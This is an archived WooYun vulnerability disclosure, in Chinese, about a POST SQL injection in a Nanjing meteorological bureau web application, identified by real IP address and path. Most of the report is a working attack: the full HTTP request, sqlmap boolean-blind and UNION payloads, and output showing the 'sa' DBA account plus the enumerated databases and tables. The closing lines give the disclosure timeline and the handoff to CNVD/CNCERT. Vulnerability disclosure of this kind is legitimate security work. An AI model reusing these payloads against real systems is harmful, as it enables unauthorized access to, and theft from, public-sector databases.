乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-05-15: 细节已通知厂商并且等待厂商处理中 2015-05-19: 厂商已经确认,细节仅向厂商公开 2015-05-29: 细节向核心白帽子及相关领域专家公开 2015-06-08: 细节向普通白帽子公开 2015-06-18: 细节向实习白帽子公开 2015-07-03: 细节向公众公开
存在POST型SQL注入,DBA权限,具体的没时间看。
url:http://221.226.82.226:8088/njqxjweb/homepages/comp_query_page.aspx注入参数:txtTableName
POST /njqxjweb/homepages/comp_query_page.aspx HTTP/1.1Content-Length: 820Content-Type: application/x-www-form-urlencodedCookie: ASP.NET_SessionId=k33dilamx5lw2qz2zc5hlf23; opusr=; duusr=Host: 221.226.82.226:8088Connection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36Accept: */*Btn_Post=%e7%82%b9%e5%87%bb&txtCaseName=xbnqkanx&txtShowHtml=1&txtShowText=1&txtSQL=1&txtTableName='%2b(select%20convert(int%2cCHAR(52)%2bCHAR(67)%2bCHAR(117)%2bCHAR(102)%2bCHAR(105)%2bCHAR(100)%2bCHAR(108)%2bCHAR(88)%2bCHAR(104)%2bCHAR(77)%2bCHAR(55))%20FROM%20syscolumns)%2b'&__EVENTARGUMENT=&__EVENTTARGET=&__VIEWSTATE=dDw3NzA3ODMwNDg7dDw7bDxpPDE%2bOz47bDx0PDtsPGk8Mz47aTwxNT47PjtsPHQ8cDxwPGw8VGV4dDs%2bO2w8XGU7Pj47Pjs7Pjt0PEAwPHA8cDxsPENzc0NsYXNzO18hU0I7PjtsPERHX1RhYmxlO2k8Mj47Pj47Pjs7cDxsPENzc0NsYXNzO18hU0I7PjtsPERHX1BhcGVyO2k8Mj47Pj47cDxsPENzc0NsYXNzO18hU0I7PjtsPERHX0hlYWRlcjtpPDI%2bOz4%2bO3A8bDxDc3NDbGFzcztfIVNCOz47bDxER19Gb290ZXI7aTwyPjs%2bPjtwPGw8Q3NzQ2xhc3M7XyFTQjs%2bO2w8REdfSXRlbTtpPDI%2bOz4%2bO3A8bDxDc3NDbGFzcztfIVNCOz47bDxER19BbHRlcjtpPDI%2bOz4%2bOzs7Oz47Oz47Pj47Pj47PieJyssa%2b%2blCTvHYFT%2bsndx1mMD6
Parameter: txtTableName (POST) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: Btn_Post=%e7%82%b9%e5%87%bb&txtCaseName=xbnqkanx&txtShowHtml=1&txtShowText=1&txtSQL=1&txtTableName='+(select convert(int,CHAR(52)+CHAR(67)+CHAR(117)+CHAR(102)+CHAR(105)+CHAR(100)+CHAR(108)+CHAR(88)+CHAR(104)+CHAR(77)+CHAR(55))FROM syscolumns)+'' AND 4026=4026 AND 'TfvQ'='TfvQ&__EVENTARGUMENT=&__EVENTTARGET=&__VIEWSTATE=dDw3NzA3ODMwNDg7dDw7bDxpPDE+Oz47bDx0PDtsPGk8Mz47aTwxNT47PjtsPHQ8cDxwPGw8VGV4dDs+O2w8XGU7Pj47Pjs7Pjt0PEAwPHA8cDxsPENzc0NsYXNzO18hU0I7PjtsPERHX1RhYmxlO2k8Mj47Pj47Pjs7cDxsPENzc0NsYXNzO18hU0I7PjtsPERHX1BhcGVyO2k8Mj47Pj47cDxsPENzc0NsYXNzO18hU0I7PjtsPERHX0hlYWRlcjtpPDI+Oz4+O3A8bDxDc3NDbGFzcztfIVNCOz47bDxER19Gb290ZXI7aTwyPjs+PjtwPGw8Q3NzQ2xhc3M7XyFTQjs+O2w8REdfSXRlbTtpPDI+Oz4+O3A8bDxDc3NDbGFzcztfIVNCOz47bDxER19BbHRlcjtpPDI+Oz4+Ozs7Oz47Oz47Pj47Pj47PieJyssa++lCTvHYFT+sndx1mMD6 Type: UNION query Title: Generic UNION query (NULL) - 13 columns Payload: Btn_Post=%e7%82%b9%e5%87%bb&txtCaseName=xbnqkanx&txtShowHtml=1&txtShowText=1&txtSQL=1&txtTableName=-2808' UNION ALL SELECT NULL,NULL,NULL,CHAR(113)+CHAR(112)+CHAR(98)+CHAR(106)+CHAR(113)+CHAR(106)+CHAR(87)+CHAR(79)+CHAR(113)+CHAR(111)+CHAR(68)+CHAR(89)+CHAR(81)+CHAR(105)+CHAR(108)+CHAR(113)+CHAR(122)+CHAR(106)+CHAR(112)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- &__EVENTARGUMENT=&__EVENTTARGET=&__VIEWSTATE=dDw3NzA3ODMwNDg7dDw7bDxpPDE+Oz47bDx0PDtsPGk8Mz47aTwxNT47PjtsPHQ8cDxwPGw8VGV4dDs+O2w8XGU7Pj47Pjs7Pjt0PEAwPHA8cDxsPENzc0NsYXNzO18hU0I7PjtsPERHX1RhYmxlO2k8Mj47Pj47Pjs7cDxsPENzc0NsYXNzO18hU0I7PjtsPERHX1BhcGVyO2k8Mj47Pj47cDxsPENzc0NsYXNzO18hU0I7PjtsPERHX0hlYWRlcjtpPDI+Oz4+O3A8bDxDc3NDbGFzcztfIVNCOz47bDxER19Gb290ZXI7aTwyPjs+PjtwPGw8Q3NzQ2xhc3M7XyFTQjs+O2w8REdfSXRlbTtpPDI+Oz4+O3A8bDxDc3NDbGFzcztfIVNCOz47bDxER19BbHRlcjtpPDI+Oz4+Ozs7Oz47Oz47Pj47Pj47PieJyssa++lCTvHYFT+sndx1mMD6---[14:57:56] [INFO] the back-end DBMS is Microsoft SQL Serverweb server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 1.1.4322back-end DBMS: Microsoft SQL Server 2005[14:57:56] [INFO] fetching current usercurrent user: 'sa'[14:57:56] [INFO] testing if current user is DBAcurrent user is DBA: True[14:57:56] [INFO] fetching database names[14:57:56] [INFO] the SQL query used returns 11 entries[14:57:56] [INFO] resumed: "master"[14:57:56] [INFO] resumed: "model"[14:57:56] [INFO] resumed: "msdb"[14:57:56] [INFO] resumed: "njqxj"[14:57:56] [INFO] resumed: "qixiang"[14:57:56] [INFO] resumed: "qixiang-www"[14:57:56] [INFO] resumed: "qx2010"[14:57:56] [INFO] resumed: "ReportServer"[14:57:56] [INFO] resumed: "ReportServerTempDB"[14:57:56] [INFO] resumed: "tempdb"[14:57:56] [INFO] resumed: "weatherforcast"available databases [11]:[*] master[*] model[*] msdb[*] njqxj[*] qixiang[*] qixiang-www[*] qx2010[*] ReportServer[*] ReportServerTempDB[*] tempdb[*] weatherforcast
Parameter: txtTableName (POST) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: Btn_Post=%e7%82%b9%e5%87%bb&txtCaseName=xbnqkanx&txtShowHtml=1&txtShowText=1&txtSQL=1&txtTableName='+(select convert(int,CHAR(52)+CHAR(67)+CHAR(117)+CHAR(102)+CHAR(105)+CHAR(100)+CHAR(108)+CHAR(88)+CHAR(104)+CHAR(77)+CHAR(55))FROM syscolumns)+'' AND 4026=4026 AND 'TfvQ'='TfvQ&__EVENTARGUMENT=&__EVENTTARGET=&__VIEWSTATE=dDw3NzA3ODMwNDg7dDw7bDxpPDE+Oz47bDx0PDtsPGk8Mz47aTwxNT47PjtsPHQ8cDxwPGw8VGV4dDs+O2w8XGU7Pj47Pjs7Pjt0PEAwPHA8cDxsPENzc0NsYXNzO18hU0I7PjtsPERHX1RhYmxlO2k8Mj47Pj47Pjs7cDxsPENzc0NsYXNzO18hU0I7PjtsPERHX1BhcGVyO2k8Mj47Pj47cDxsPENzc0NsYXNzO18hU0I7PjtsPERHX0hlYWRlcjtpPDI+Oz4+O3A8bDxDc3NDbGFzcztfIVNCOz47bDxER19Gb290ZXI7aTwyPjs+PjtwPGw8Q3NzQ2xhc3M7XyFTQjs+O2w8REdfSXRlbTtpPDI+Oz4+O3A8bDxDc3NDbGFzcztfIVNCOz47bDxER19BbHRlcjtpPDI+Oz4+Ozs7Oz47Oz47Pj47Pj47PieJyssa++lCTvHYFT+sndx1mMD6 Type: UNION query Title: Generic UNION query (NULL) - 13 columns Payload: Btn_Post=%e7%82%b9%e5%87%bb&txtCaseName=xbnqkanx&txtShowHtml=1&txtShowText=1&txtSQL=1&txtTableName=-2808' UNION ALL SELECT NULL,NULL,NULL,CHAR(113)+CHAR(112)+CHAR(98)+CHAR(106)+CHAR(113)+CHAR(106)+CHAR(87)+CHAR(79)+CHAR(113)+CHAR(111)+CHAR(68)+CHAR(89)+CHAR(81)+CHAR(105)+CHAR(108)+CHAR(113)+CHAR(122)+CHAR(106)+CHAR(112)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- &__EVENTARGUMENT=&__EVENTTARGET=&__VIEWSTATE=dDw3NzA3ODMwNDg7dDw7bDxpPDE+Oz47bDx0PDtsPGk8Mz47aTwxNT47PjtsPHQ8cDxwPGw8VGV4dDs+O2w8XGU7Pj47Pjs7Pjt0PEAwPHA8cDxsPENzc0NsYXNzO18hU0I7PjtsPERHX1RhYmxlO2k8Mj47Pj47Pjs7cDxsPENzc0NsYXNzO18hU0I7PjtsPERHX1BhcGVyO2k8Mj47Pj47cDxsPENzc0NsYXNzO18hU0I7PjtsPERHX0hlYWRlcjtpPDI+Oz4+O3A8bDxDc3NDbGFzcztfIVNCOz47bDxER19Gb290ZXI7aTwyPjs+PjtwPGw8Q3NzQ2xhc3M7XyFTQjs+O2w8REdfSXRlbTtpPDI+Oz4+O3A8bDxDc3NDbGFzcztfIVNCOz47bDxER19BbHRlcjtpPDI+Oz4+Ozs7Oz47Oz47Pj47Pj47PieJyssa++lCTvHYFT+sndx1mMD6---[14:59:28] [INFO] the back-end DBMS is Microsoft SQL Serverweb server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 1.1.4322back-end DBMS: Microsoft SQL Server 2005[14:59:28] [INFO] fetching tables for database: [qixiang-www][14:59:28] [INFO] the SQL query used returns 56 entriesDatabase: qixiang-www[56 tables]+---------------------------+| Attachfile || Category || CategoryValue || ColsRemark || ConfigRow || Dept || DisserManage || EffectDate || ImportDocuments || JobBase || JobdelayInfo || OperateLog || TableQueryCondition || TablesBasicDebug || TablesRemark || TailorFormCol || TailorFormCol || TempWebusercase || Usr || WebAttachfile || WebResource || WebUserFromOA || balloonreleasespots || caseballoonqualify || caseballoonqualify || casebaseprocedure || casebaseprocedure || caseimportdocList || caseimportdocList || caseinstanceimportdoclist || caseinstanceimportdoclist || caseresultselected || dataListColumn || dataListDefine || dtproperties || guestProctrans || jobRelation || lightningproofbuilding || lightningproofdesign || lightningprooffinish || othercasebase || powercode || procform || procguide || punishdisclose || sqdwb || sqrb || tableTrigger || webcaseinstanceimportdoc || webusercase || webusercase || workflowchart || workflowchart || workflowform || workflownext || workstep |+---------------------------+
大家都知道。
危害等级:中
漏洞Rank:10
确认时间:2015-05-19 17:33
CNVD未直接复现所述情况,已经转由CNCERT下发给江苏分中心,由其后续协调网站管理单位处置。
暂无